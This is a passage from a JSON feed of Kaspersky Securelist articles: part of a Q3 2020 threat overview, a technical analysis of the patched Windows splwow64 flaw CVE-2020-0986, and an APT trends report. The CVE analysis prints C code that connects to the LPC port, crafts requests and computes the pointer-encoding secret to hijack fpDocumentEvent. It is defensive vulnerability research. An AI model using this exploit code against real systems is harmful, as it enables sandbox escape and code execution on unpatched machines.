cent.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/06/30143828/sl_pre-installed_ads_01.png>)\n\nSince the Android security model assumes that anti-virus is a normal app, it is unable to do anything [adware or malware in system directories](<https://securelist.com/pig-in-a-poke-smartphone-adware/97607/>), making this a serious problem.\n\nOur investigations show that the focus of some mobile device suppliers is on maximizing profits through all kinds of advertising tools, even if such tools cause inconvenience to device owners. If advertising networks are ready to pay for views, clicks, and installations regardless of their source, it makes sense for them to embed ad modules into devices to increase the profit from each device sold.", "cvss3": {}, "published": "2020-11-20T10:00:58", "type": "securelist", "title": "IT threat evolution Q3 2020", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-0986", "CVE-2020-1380"], "modified": "2020-11-20T10:00:58", "id": "SECURELIST:03ACF8FB3AEA9D33D265642AD60AF9E9", "href": "https://securelist.com/it-threat-evolution-q3-2020/99382/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T16:17:54", "description": "\n\nIn August 2020, we published a blog post about [Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). This targeted attack consisted of two zero-day exploits: a remote code execution exploit for Internet Explorer 11 and an elevation of privilege exploit targeting the latest builds of Windows 10. While we already described the exploit for Internet Explorer in the original blog post, we also promised to share more details about the elevation of privilege exploit in a follow-up post. Let's take a look at vulnerability CVE-2020-0986, how it was exploited by attackers, how it was fixed and what additional mitigations were implemented to complicate exploitation of many other similar vulnerabilities.\n\n## CVE-2020-0986\n\nCVE-2020-0986 is an arbitrary pointer dereference vulnerability in [GDI Print](<https://docs.microsoft.com/en-us/windows/win32/printdocs/about-the-gdi-print-api>)/[Print Spooler](<https://docs.microsoft.com/en-us/windows/win32/printdocs/print-spooler-api>) API. By using this vulnerability it is possible to manipulate the memory of the splwow64.exe process to achieve execution of arbitrary code in the process and escape the Internet Explorer 11 sandbox because splwow64.exe is running with medium integrity level. "Print driver host for applications," as Microsoft describes splwow64.exe, is a relatively small binary that hosts 64-bit user-mode printer drivers and implements the Local Procedure Call (LPC) server that can be used by other processes to access printing functions. This allows the use of 64-bit printer drivers from 32-bit processes. Below I provide the code that can be used to spawn splwow64.exe and connect to splwow64.exe's LPC server.\n \n \n typedef struct _PORT_VIEW\n {\n \tUINT64 Length;\n \tHANDLE SectionHandle;\n \tUINT64 SectionOffset;\n \tUINT64 ViewSize;\n \tUCHAR* ViewBase;\n \tUCHAR* ViewRemoteBase;\n } PORT_VIEW, *PPORT_VIEW;\n \n PORT_VIEW ClientView;\n \n typedef struct _PORT_MESSAGE_HEADER {\n \tUSHORT DataSize;\n \tUSHORT MessageSize;\n \tUSHORT MessageType;\n \tUSHORT VirtualRangesOffset;\n \tCLIENT_ID ClientId;\n \tUINT64 MessageId;\n \tUINT64 SectionSize;\n } PORT_MESSAGE_HEADER, *PPORT_MESSAGE_HEADER;\n \n typedef struct _PROXY_MSG {\n \tPORT_MESSAGE_HEADER MessageHeader;\n \tUINT64 InputBufSize;\n \tUINT64 InputBuf;\n \tUINT64 OutputBufSize;\n \tUINT64 OutputBuf;\n \tUCHAR Padding[0x1F8];\n } PROXY_MSG, *PPORT_MESSAGE;\n \n PROXY_MSG LpcReply;\n PROXY_MSG LpcRequest;\n \n int GetPortName(PUNICODE_STRING DestinationString)\n {\n \tvoid *tokenHandle;\n \tDWORD sessionId;\n \tULONG length;\n \n \tint tokenInformation[16];\n \tWCHAR dst[256];\n \n \tmemset(tokenInformation, 0, sizeof(tokenInformation));\n \tProcessIdToSessionId(GetCurrentProcessId(), &sessionId);\n \n \tmemset(dst, 0, sizeof(dst));\n \n \tif (NtOpenProcessToken(GetCurrentProcess(), READ_CONTROL | TOKEN_QUERY, &tokenHandle)\n \t\t|| ZwQueryInformationToken(tokenHandle, TokenStatistics, tokenInformation, sizeof(tokenInformation), &length))\n \t{\n \t\treturn 0;\n \t}\n \n \twsprintfW(\n \t\tdst,\n \t\tL\"\\\\RPC Control\\\\UmpdProxy_%x_%x_%x_%x\",\n \t\tsessionId,\n \t\ttokenInformation[2],\n \t\ttokenInformation[3],\n \t\t0x2000);\n \tRtlInitUnicodeString(DestinationString, dst);\n \n \treturn 1;\n }\n \n HANDLE CreatePortSharedBuffer(PUNICODE_STRING PortName)\n {\n \tHANDLE sectionHandle = 0;\n \tHANDLE portHandle = 0;\n \tunion _LARGE_INTEGER maximumSize;\n \tmaximumSize.QuadPart = 0x20000;\n \n \tNtCreateSection(§ionHandle, SECTION_MAP_WRITE | SECTION_MAP_READ, 0, &maximumSize, PAGE_READWRITE, SEC_COMMIT, NULL);\n \tif (sectionHandle)\n \t{\n \t\tClientView.SectionHandle = sectionHandle;\n \t\tClientView.Length = 0x30;\n \t\tClientView.ViewSize = 0x9000;\n \t\tZwSecureConnectPort(&portHandle, PortName, NULL, &ClientView, NULL, NULL, NULL, NULL, NULL);\n \t}\n \n \treturn portHandle;\n }\n \n int main()\n {\n \tprintf(\"Spawn splwow64.exe\\n\");\n \tCHAR Path[0x100];\n \tGetCurrentDirectoryA(sizeof(Path), Path);\n \tPathAppendA(Path, \"CreateDC.exe\"); // x86 application with call to CreateDC\n \tWinExec(Path, 0);\n \tSleep(1000);\n \n \tCreateDCW(L\"Microsoft XPS Document Writer\", L\"Microsoft XPS Document Writer\", NULL, NULL);\n \n \tprintf(\"Get port name\\n\");\n \tUNICODE_STRING portName;\n \tif (!GetPortName(&portName))\n \t{\n \t\tprintf(\"Failed to get port name\\n\");\n \t\treturn 0;\n \t}\n \n \tprintf(\"Create port\\n\");\n \tHANDLE portHandle = CreatePortSharedBuffer(&portName);\n \tif (!(portHandle && ClientView.ViewBase && ClientView.ViewRemoteBase))\n \t{\n \t\tprintf(\"Failed to create port\\n\");\n \t\treturn 0;\n \t}\n }\n\nTo send data to the LPC server it's enough to prepare the printer command in the shared memory region and send an LPC message with NtRequestWaitReplyPort().\n \n \n memset(&LpcRequest, 0, sizeof(LpcRequest));\n LpcRequest.MessageHeader.DataSize = 0x20;\n LpcRequest.MessageHeader.MessageSize = 0x48;\n \n LpcRequest.InputBufSize = 0x88;\n LpcRequest.InputBuf = (UINT64)ClientView.ViewRemoteBase; // Points to printer command\n LpcRequest.OutputBufSize = 0x10;\n LpcRequest.OutputBuf = (UINT64)ClientView.ViewRemoteBase + LpcRequest.InputBufSize;\n \n // TODO: Prepare printer command\n \n NtRequestWaitReplyPort(portHandle, &LpcRequest, &LpcReply);\n\nWhen the LPC message is received, it is processed by the function TLPCMgr::ProcessRequest(PROXY_MSG *). This function takes _LpcRequest_ as a parameter and verifies it. After that it allocates a buffer for the printer command and copies it there from shared memory. The printer command function INDEX, which is used to identify different driver functions, is stored as a double word at offset 4 in the printer command structure. Almost a complete list of different function INDEX values can be found in the header file _winddi.h_. This header file includes different INDEX values from INDEX_DrvEnablePDEV (0) up to INDEX_LAST (103), but the full list of INDEX values does not end there. Analysis of gdi32full.dll reveals that that are a number of special INDEX values and some of them are provided in the table below (to find them in binary, look for calls to PROXYPORT::SendRequest).\n \n \n 106 \u2013 INDEX_LoadDriver\n 107 - INDEX_UnloadDriver\n 109 \u2013 INDEX_DocumentEvent\n 110 \u2013 INDEX_StartDocPrinterW\n 111 \u2013 INDEX_StartPagePrinter\n 112 \u2013 INDEX_EndPagePrinter\n 113 \u2013 INDEX_EndDocPrinter\n 114 \u2013 INDEX_AbortPrinter\n 115 \u2013 INDEX_ResetPrinterW\n 116 \u2013 INDEX_QueryColorProfile\n\nFunction TLPCMgr::ProcessRequest(PROXY_MSG *) checks the function INDEX value and if it passes the checks, the printer command will be processed by function GdiPrinterThunk in gdi32full.dll.\n \n \n if ( IsKernelMsg || INDEX >= 106 && (INDEX <= 107 || INDEX - 109 <= 7))\n {\n // \u2026\n GdiPrinterThunk(LpcRequestInputBuf, LpcRequestOutputBuf, LpcRequestOutputBufSize);\n }\n\nGdiPrinterThunk itself is a very large function that processes more than 60 different function INDEX values, and the handler for one of them \u2013 namely INDEX_DocumentEvent \u2013 contains vulnerability CVE-2020-0986. The handler for INDEX_DocumentEvent will use information provided in the printer command (fully controllable from the LPC client) to check that the command is intended for a printer with a valid handle. After the check it will use the function DecodePointer to decode the pointer of the function stored at the _fpDocumentEvent_ global variable (located in .data segment), then use the decoded pointer to execute the function, and finally perform a call to memcpy() where source, destination and size arguments are obtained from the printer command and are fully controllable by the attacker.\n\n## Exploitation\n\nIn Windows OS the base addresses of system DLL libraries are randomized with each boot, aiding exploitation of this vulnerability. The exploit loads the libraries gdi32full.dll and winspool.drv, and then obtains the offset of the _fpDocumentEvent_ pointer from gdi32full.dll and the address of the DocumentEvent function from winspool.drv. After that the exploit performs a number of LPC requests with specially crafted INDEX_DocumentEvent commands to leak the value of the _fpDocumentEvent_ pointer. The value of the raw pointer is protected using [EncodePointer](<https://docs.microsoft.com/en-us/previous-versions/bb432254\\(v=vs.85\\)>) protection, but the function pointed to by this raw pointer is executed each time the INDEX_DocumentEvent command is sent and the arguments of this function are fully controllable. All this makes the _fpDocumentEvent_ pointer the best candidate for an overwrite. A necessary step for exploitation is to encode our own pointer in such a manner that it will be properly decoded by the function DecodePointer. Since we have the value of the encoded pointer and the value of the decoded pointer (address of the DocumentEvent function from winspool.drv), we are able to calculate the secret constant used for pointer encoding and then use it to encode our own pointer. The necessary calculations are provided below.\n \n \n // Calculate secret for pointer encoding\n while (1)\n {\n \tsecret = (unsigned int)DocumentEvent ^ __ROL8__(*(UINT64*)leaked_fpDocumentEvent, i & 0x3F);\n \tif ((secret & 0x3F) == i && __ROR8__((UINT64)DocumentEvent ^ secret, secret & 0x3F) == *(UINT64*)leaked_fpDocumentEvent)\n \t\tbreak;\n \tif (++i > 0x3F)\n \t{\n \t\tsecret = 0;\n \t\tbreak;\n \t}\n }\n \n // Encode LoadLibraryA pointer with calculated secret\n UINT64 encodedPtr = __ROR8__(secret ^ (UINT64)LoadLibraryA, secret & 0x3F);\n\nAt this stage, in order to achieve code execution from the splwow64.exe process, it's sufficient to overwrite the _fpDocumentEvent_ pointer with the encoded pointer of function LoadLibraryA and provide the name of a library to load in the next LPC request with the INDEX_DocumentEvent command.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31152055/sl_operation_powerfall_01.png>)\n\n**_Overview of attack_**\n\n## CVE-2019-0880\n\nAnalysis of CVE-2020-0986 reveals that this vulnerability is the twin brother of the previously discovered CVE-2019-0880. The write-up for CVE-2019-0880 is available [here](<https://byteraptors.github.io/windows/exploitation/2020/05/24/sandboxescape.html>). It's another vulnerability that was exploited as an in-the-wild zero-day. CVE-2019-0880 is just another fully controllable call to memcpy() in the same GdiPrinterThunk function, just a few lines of code away in a handler of function INDEX 118. It seems hard to believe that the developers didn't notice the existence of a variant for this vulnerability, so why was CVE-2020-0986 not patched back then and why did it take so long to fix it? It may not be obvious on first glance, but GdiPrinterThunk is totally broken. Even fixing a couple of calls to memcpy doesn't really help.\n\n## Arbitrary pointer dereference host for applications\n\nThe problem lies in the fact that almost every function INDEX in GdiPrinterThunk is susceptible to a potential arbitrary pointer dereference vulnerability. Let's take a look again at the format of the LPC request message.\n \n \n typedef struct _PROXY_MSG {\n \tPORT_MESSAGE_HEADER MessageHeader;\n \tUINT64 InputBufSize;\n \tUINT64 InputBuf;\n \tUINT64 OutputBufSize;\n \tUINT64 OutputBuf;\n \tUCHAR Padding[0x1F8];\n } PROXY_MSG, *PPORT_MESSAGE;\n\n_InputBuf_ and _OutputBuf_ are both pointers that should point to a shared memory region. _InputBuf_ points to a location where the printer command is prepared, and when this command is processed by GdiPrinterThunk the result might be written back to the LPC client using the pointer that was provided as _OutputBuf_. Many handlers for different INDEX values provide data to the LPC client, but the problem is that the pointers _InputBuf_ and _OutputBuf_ are fully controllable from the LPC client and manipulation of the _OutputBuf_ pointer can lead to an overwrite of splwow64.exe's process memory.\n\n## How it was mitigated\n\nMicrosoft fixed CVE-2020-0986, but also implemented a mitigation aimed to make exploitation of _OutputBuf_ vulnerabilities as hard as possible. Before the patch the function FindPrinterHandle() blindly trusted the data provided through the printer command in an LPC request and it was easy to bypass a valid handle check. After the patch the format of the printer command was changed so it no longer contains the address of the handle table, but instead contains a valid driver ID (quad word at offset 0x18). Now the linked list of handle tables is stored inside the splwow64.exe process and the new function FindDriverForCookie() uses the provided driver ID to get a handle table securely. For a printer command to be processed it should contain a valid printer handle (quad word at offset 0x20). The printer handle consists of process ID and the address of the buffer allocated for the printer driver. It is possible to guess some bytes of the printer handle, but a successful real-world brute-force attack on this implementation seems to be unlikely. So, it's safe to assume that this bug class was properly mitigated. However, there are still a couple of places in the code where it is possible to write a 0 for the address provided as _OutputBuf_ without a handle check, but exploitation in such a scenario doesn't appear to be feasible.", "cvss3": {}, "published": "2020-09-02T10:00:56", "type": "securelist", "title": "Operation PowerFall: CVE-2020-0986 and variants", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0880", "CVE-2020-0986"], "modified": "2020-09-02T10:00:56", "id": "SECURELIST:C65BBC029B301149C73E48F99596B4A0", "href": "https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-04T08:16:24", "description": "\n\nFor more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q3 2020.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nWe have already partly documented the activities of DeathStalker, a unique threat group that seems to focus mainly on law firms and companies operating in the financial sector. The group's interest in gathering sensitive business information leads us to believe that DeathStalker is a group of mercenaries offering hacking-for-hire services, or acting as an information broker in financial circles. The activities of this threat actor first came to our attention through a PowerShell-based implant called Powersing. This quarter, we unraveled the threads of DeathStalker's LNK-based Powersing intrusion workflow. While there is nothing groundbreaking in the whole toolset, we believe defenders can gain a lot of value by understanding the underpinnings of a modern, albeit low-tech, infection chain used by a successful threat actor. DeathStalker continues to develop and use this implant, using tactics that have mostly been identical since 2018, while making greater efforts to evade detection. In August, our [public report of DeathStalker's activities](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) summarized the three scripting language-based toolchains used by the group \u2013 Powersing, Janicab and Evilnum.\n\nFollowing our initial private report on Evilnum, we detected a new batch of implants in late June 2020, showing interesting changes in the (so far) quite static modus operandi of DeathStalker. For instance, the malware directly connects to a C2 server using an embedded IP address or domain name, as opposed to previous variants where it made use of at least two dead drop resolvers (DDRs) or web services, such as forums and code sharing platforms, to fetch the real C2 IP address or domain. Interestingly, for this campaign the attackers didn't limit themselves merely to sending spear-phishing emails but actively engaged victims through multiple emails, persuading them to open the decoy, to increase the chance of compromise. Furthermore, aside from using Python-based implants throughout the intrusion cycle, in both new and old variants, this was the first time that we had seen the actor dropping PE binaries as intermediate stages to load Evilnum, while using advanced techniques to evade and bypass security products.\n\nWe also found another intricate, low-tech implant that we attribute to DeathStalker with medium confidence. The delivery workflow uses a Microsoft Word document and drops a previously unknown PowerShell implant that relies on DNS over HTTPS (DoH) as a C2 channel. We dubbed this implant PowerPepper.\n\nDuring a recent investigation of a targeted campaign, we found a UEFI firmware image containing rogue components that drop previously unknown malware to disk. Our analysis showed that the revealed firmware modules were based on a known bootkit named Vector-EDK, and the dropped malware is a downloader for further components. By pivoting on unique traits of the malware, we uncovered a range of similar samples from our telemetry that have been used against diplomatic targets since 2017 and have different infection vectors. While the business logic of most is identical, we could see that some had additional features or differed in implementation. Due to this, we infer that the bulk of samples originate from a bigger framework that we have dubbed [MosaicRegressor](<https://securelist.com/mosaicregressor/98849/>). Code artefacts in some of the framework's components, and overlaps in C2 infrastructure used during the campaign, suggest that a Chinese-speaking actor is behind these attacks, possibly one that has connections to groups using the Winnti backdoor. The targets, diplomatic institutions and NGOs in Asia, Europe and Africa, all appear to be connected in some way to North Korea.\n\n## Europe\n\nSince publishing our initial report on WellMess (see our [_APT trends report Q2 2020_](<https://securelist.com/apt-trends-report-q2-2020/97937/>)), the UK National Cyber Security Centre (NCSC) has released a joint technical advisory, along with Canadian and US governments, on the most recent activity involving WellMess. Specifically, all three governments attribute the use of this malware targeting COVID-19 vaccine research to The Dukes (aka APT29 and Cozy Bear). The advisory also details two other pieces of malware, SOREFANG and WellMail, that were used during this activity. Given the direct public statement on attribution, new details provided in the advisory, as well as new information discovered since our initial investigation, we published our report to serve as a supplement to our previous reporting on this threat actor. While the publication of the NCSC advisory has increased general public awareness on the malware used in these recent attacks, the attribution statements made by all three governments provided no clear evidence for other researchers to pivot on for confirmation. For this reason, we are currently unable to modify our original statement; and we still assess that the WellMess activity has been conducted by a previously unknown threat actor. We will continue to monitor for new activity and adjust this statement in the future if new evidence is uncovered.\n\n## Russian-speaking activity\n\nIn summer, we uncovered a previously unknown multimodule C++ toolset used in highly targeted industrial espionage attacks dating back to 2018. So far, we have seen no similarities with known malicious activity regarding code, infrastructure or TTPs. To date, we consider this toolset and the actor behind it to be new. The malware authors named the toolset MT3, and based on this abbreviation we have named the toolset [MontysThree](<https://securelist.com/montysthree-industrial-espionage/98972/>). The malware is configured to search for specific document types, including those stored on removable media. It contains natural language artefacts of correct Russian and a configuration that seek directories that exist only in Cyrilic version of Windows, while presenting some false flag artefacts suggesting a Chinese-speaking origin. The malware uses legitimate cloud services such as Google, Microsoft and Dropbox for C2 communications.\n\n## Chinese-speaking activity\n\nEarlier this year, we discovered an active and previously unknown stealthy implant dubbed Moriya in the networks of regional inter-governmental organizations in Asia and Africa. This tool was used to control public facing servers in those organizations by establishing a covert channel with a C2 server and passing shell commands and their outputs to the C2. This capability is facilitated using a Windows kernel mode driver. Use of the tool is part of an ongoing campaign that we have named TunnelSnake. The rootkit was detected on the targeted machines in May, with activity dating back as early as November 2019, persisting in networks for several months following the initial infection. We found another tool showing significant code overlaps with this rootkit, suggesting that the developers have been active since at least 2018. Since neither rootkit nor other lateral movement tools that accompanied it during the campaign relied on hard-coded C2 servers, we could gain only partial visibility into the attacker's infrastructure. That said, the bulk of detected tools, apart from Moriya, consisted of both proprietary and well-known pieces of malware that were previously used by Chinese-speaking threat actors, giving a clue to the attacker's origin.\n\nPlugX continues to be effectively and heavily used across Southeast and East Asia, and also Africa, with some minimal use in Europe. The PlugX codebase has been in use by multiple Chinese-speaking APT groups, including HoneyMyte, Cycldek and LuckyMouse. Government agencies, NGOs and IT service organizations seem to be consistent targets. While the new USB spreading capability is opportunistically pushing the malware throughout networks, compromised MSSPs/IT service organizations appear to be a potential vector of targeted delivery, with CobaltStrike installer packages pushed to multiple systems for initial PlugX installation. Based on our visibility, the majority of activity in the last quarter appears to be in Mongolia, Vietnam and Myanmar. The number of systems in these countries dealing with PlugX in 2020 is at the very least in the thousands.\n\nWe discovered an ongoing campaign, dating back to May, utilizing a new version of the Okrum backdoor, attributed to Ke3chang. This updated version of Okrum uses an Authenticode-signed Windows Defender binary using a unique side-loading technique. The attackers used steganography to conceal the main payload in the Defender executable while keeping its digital signature valid, reducing the chance of detection. We haven't previously seen this method being used in the wild for malicious purposes. We have observed one affected victim, a telecoms company located in Europe.\n\nOn September 16, the [US Department of Justice released three indictments associated with hackers allegedly connected with APT41](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>) and other intrusion sets tracked as Barium, Winnti, Wicked Panda and Wicked Spider. In addition, two Malaysian nationals were also arrested on September 14, in Sitiawan (Malaysia), for "conspiring to profit from computer intrusions targeting the video game industry", following cooperation between the US DoJ and the Malaysian government, including the Attorney General's Chambers of Malaysia and the Royal Malaysia Police. The first indictment alleges that the defendants set up an elite "white hat" network security company, called Chengdu 404 Network Technology Co, Ltd. (aka Chengdu Si Lingsi Network Technology Co., Ltd.), and under its guise, engaged in computer intrusions targeting hundreds of companies around the world. According to the indictment, they "carried out their hacking using specialized malware, such as malware that cyber-security experts named 'PlugX/Fast', 'Winnti/Pasteboy', 'Shadowpad', 'Barlaiy/Poison Plug' and 'Crosswalk/ProxIP'". The indictments contain several indirect IoCs, which allowed us to connect these intrusions to Operation ShadowPad and Operation ShadowHammer, two massive supply-chain attacks discovered and investigated by Kaspersky in recent years.\n\n## Middle East\n\nIn June, we observed new activity by the MuddyWater APT group, involving use of a new set of tools that constitute a multistage framework for loading malware modules. Some components of the framework leverage code to communicate with C2s identical to code we observed in the MoriAgent malware earlier this year. For this reason, we decided to dub the new framework MementoMori. The purpose of the new framework is to facilitate execution of further in-memory PowerShell or DLL modules. We detected high-profile victims based in Turkey, Egypt and Azerbaijan.\n\n## Southeast Asia and Korean Peninsula\n\nIn May, we found new samples belonging to the Dtrack family. The first sample, named Valefor, is an updated version of the Dtrack RAT containing a new feature enabling the attacker to execute more types of payload. The second sample is a keylogger called Camio which is an updated version of its keylogger. This new version updates the logged information and its storage mechanism. We observed signs indicating that these malware programs were tailored for specific victims. At the time of our research our telemetry revealed victims located in Japan.\n\nWe have been tracking LODEINFO, fileless malware used in targeted attacks since last December. During this time, we observed several versions as the authors were developing the malware. In May, we detected version v0.3.6 targeting diplomatic organizations located in Japan. Shortly after that, we detected v0.3.8 as well. Our investigation revealed how the attackers operate during the lateral movement stage: after obtaining the desired data, the attackers wipe their traces. Our private report included a technical analysis of the LODEINFO malware and the attack sequence in the victim's network, to disclose the actor's tactics and methods.\n\nWhile tracking Transparent Tribe activity, we discovered an interesting tool used by this APT threat actor: the server component used to manage CrimsonRAT bots. We found different versions of this software, allowing us to look at the malware from the perspective of the attackers. It shows that the main purpose of this tool is file stealing, given its functionalities for exploring the remote file system and collecting files using specific filters. Transparent Tribe (aka PROJECTM and MYTHIC LEOPARD) is a very prolific APT group that has increased its activities in recent months. We reported [the launch of a new wide-ranging campaign that uses the CrimsonRAT tool](<https://securelist.com/transparent-tribe-part-1/98127/>) where we were able to set up and analyze the server component and saw the use of the USBWorm component for the first time; we also found [an Android implant used to target military personnel in India](<https://securelist.com/transparent-tribe-part-2/98233/>). This discovery also confirms much of the information already discovered during previous investigations; and it also confirms that CrimsonRAT is still under active development.\n\nIn April, we discovered a new malware strain that we named CRAT, based on the build path and internal file name. The malware was spread using a weaponized Hangul document as well as a Trojanized application and strategic web compromise. Since its discovery the full-featured backdoor has quickly evolved, diversifying into several components. A downloader delivers CRAT to profile victims, followed by next-stage orchestrator malware named SecondCrat: this orchestrator loads various plugins for espionage, including keylogging, screen capturing and clipboard stealing. During our investigation, we found several weak connections with ScarCruft and Lazarus: we discovered that several debugging messages inside the malware have similar patterns to ScarCruft malware, as well as some code patterns and the naming of the Lazarus C2 infrastructure.\n\nIn June, we observed a new set of malicious Android downloaders which, according to our telemetry, have been actively used in the wild since at least December 2019; and have been used in a campaign targeting victims almost exclusively in Pakistan. Its authors used the Kotlin programming language and Firebase messaging system for the downloader, which mimics Chat Lite, Kashmir News Service and other legitimate regional Android applications. A report by the National Telecom & Information Technology Security Board (NTISB) from January describes malware sharing the same C2s and spoofing the same legitimate apps. According to this publication, targets were Pakistani military bodies, and the attackers used WhatsApp messages, SMS, emails and social media as the initial infection vectors. Our own telemetry shows that this malware also spreads through Telegram messenger. The analysis of the initial set of downloaders allowed us to find an additional set of Trojans that we believe are strongly related, as they use the package name mentioned in the downloaders and focus on the same targets. These new samples have strong code similarity with artefacts previously attributed to Origami Elephant.\n\nIn mid-July, we observed a Southeast Asian government organization targeted by an unknown threat actor with a malicious ZIP package containing a multilayered malicious RAR executable package. In one of the incidents, the package was themed around COVID-19 containment. We believe that the same organization was probably the same target of a government web server watering-hole, compromised in early July and serving a highly similar malicious LNK. Much like other campaigns against particular countries that we have seen in the past, these adversaries are taking a long-term, multipronged approach to compromising target systems without utilizing zero-day exploits. Notably, another group (probably OceanLotus) used a similar Telegram delivery technique with its malware implants against the same government targets within a month or so of the COVID-19-themed malicious LNK, in addition to its use of Cobalt Strike.\n\nIn May 2020, Kaspersky technologies prevented an attack using a malicious script for Internet Explorer against a South Korean company. Closer analysis revealed that the attack used a previously unknown full chain that consisted of two zero-day exploits: a Remote Code Execution exploit for Internet Explorer and an Elevation of Privilege exploit for Windows. Unlike a previous full chain that we discovered, used in Operation WizardOpium (you can read more [here ](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>)and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), the new full chain targeted the latest builds of Windows 10, and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build 18363 x64. On June 8, we reported our discoveries to Microsoft, who confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for vulnerability CVE-2020-0986 that was used in the zero-day Elevation of Privilege exploit; but before our discovery, the exploitability of this vulnerability had been considered less likely. The patch for CVE-2020-0986 was released on June 9. Microsoft assigned CVE-2020-1380 to a use-after-free vulnerability in JScript and the patch for this was released on August 11. We are calling this and related attacks [Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). Currently, we are unable to establish a definitive link with any known threat actor, but due to similarities with previously discovered exploits we believe that DarkHotel may be behind this attack.\n\nOn July 22, we came across a suspicious archive file that was uploaded to VirusTotal from an Italian source. The file seemed to be a triage consisting of malicious scripts, access logs, malicious document files and several screenshots related to suspicious file detections from security solutions. After looking into these malicious document files, we identified that they are related to a Lazarus group campaign that we reported in June. This campaign, dubbed DeathNote, targeted the automobile industry and individuals in the academic field using lure documents containing aerospace and defense-related job descriptions. We are confident that these documents are related to a recently reported attack on an Israeli defense company. We have uncovered webshell scripts, C2 server scripts and malicious documents, identified several victims connected to the compromised C2 server, as well as uncovering the method used to access the C2 server.\n\nWe have observed an ongoing Sidewinder campaign that started in February, using five different malware types. The group made changes to its final payloads and continues to target government, diplomatic and military entities using current themes, such as COVID-19, in its spear-phishing efforts. While the infection mechanism remains the same as before, including the group's exploit of choice (CVE-2017-1182) and use of the DotNetToJScript tool to deploy the final payloads, we found that the actor also used ZIP archives containing a Microsoft compiled HTML Help file to download the last-stage payload. In addition to the existing .NET-based implant, which we call SystemApp, the threat actor added JS Orchestrator, the Rover/Scout backdoor and modified versions of AsyncRAT, warzoneRAT to its arsenal.\n\n## Other interesting discoveries\n\nAttribution is difficult at the best of times, and sometimes it's not possible at all. While investigating an ongoing campaign, we discovered a new Android implant undergoing development, with no clear link to any previously known Android malware. The malware is able to monitor and steal call logs, SMS, audio, video and non-media files, as well as identifying information about the infected device. It also implements an interesting feature to collect information on network routes and topology obtained using the "traceroute" command as well as using local ARP caches. During this investigation we uncovered a cluster of similar Android infostealer implants, with one example being obfuscated. We also found older Android malware that more closely resembles a backdoor, with traces of it in the wild dating back to August 2019.\n\nIn April, Cisco Talos described the activities of an unknown actor targeting Azerbaijan's government and energy sector using new malware called PoetRAT. In collaboration with Kaspersky ICS CERT, we identified supplementary samples of associated malware and documents with broader targeting of multiple universities, government and industrial organizations as well as entities in the energy sector in Azerbaijan. The campaign started in early November 2019; and the attackers switched off the infrastructure immediately following publication of the Cisco Talos report. We observed a small overlap in victimology with Turla, but since there is no technically sound proof of relation between them, and we haven't been able to attribute this new set of activity to any other previously known actor, we named it Obsidian Gargoyle.\n\n## Final thoughts\n\nThe TTPs of some threat actors remain fairly consistent over time (such as using hot topics such (COVID-19) to entice users to download and execute malicious attachments sent in spear-phishing emails), while other groups reinvent themselves, developing new toolsets and widening their scope of activities, for example, to include new platforms. And while some threat actors develop [very sophisticated tools](<https://securelist.com/mosaicregressor/98849/>), for example, MosiacRegressor UEFI implant, others [have great success](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) with basic TTPs. Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we've seen in Q3 2020:\n\n * Geo-politics continues to drive the development of many APT campaigns, as seen in recent months in the activities of Transparent Tribe, Sidewinder, Origami Elephant and MosaicRegressor, and in the 'naming and shaming' of various threat actors by the NCSC and the US Department of Justice.\n * Organizations in the financial sector also continue to attract attention: the activities of the mercenary group DeathStalker is a recent example.\n * We continue to observe the use of mobile implants in APT attacks with recent examples including Transparent Tribe and Origami Elephant.\n * While APT threat actors remain active across the globe, recent hotspots of activity have been Southeast Asia, the Middle East and various regions affected by the activities of Chinese-speaking APT groups.\n * Unsurprisingly, we continue to see COVID-19-themed attacks \u2013 this quarter they included WellMess and Sidewinder.\n * Among the most interesting APT campaigns this quarter were DeathStalker and MosaicRegressor: the former underlining the fact that APT groups can achieve their aims without developing highly sophisticated tools; the latter representing the leading-edge in malware development.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {}, "published": "2020-11-03T10:00:37", "type": "securelist", "title": "APT trends report Q3 2020", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-1182", "CVE-2019-13720", "CVE-2019-1458", "CVE-2020-0986", "CVE-2020-1380"], "modified": "2020-11-03T10:00:37", "id": "SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C", "href": "https://securelist.com/apt-trends-report-q3-2020/99204/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-13T08:04:21", "description": "\n\n## Executive summary\n\nIn May 2020, Kaspersky technologies prevented an attack on a South Korean company by a malicious script for Internet Explorer. Closer analysis revealed that the attack used a previously 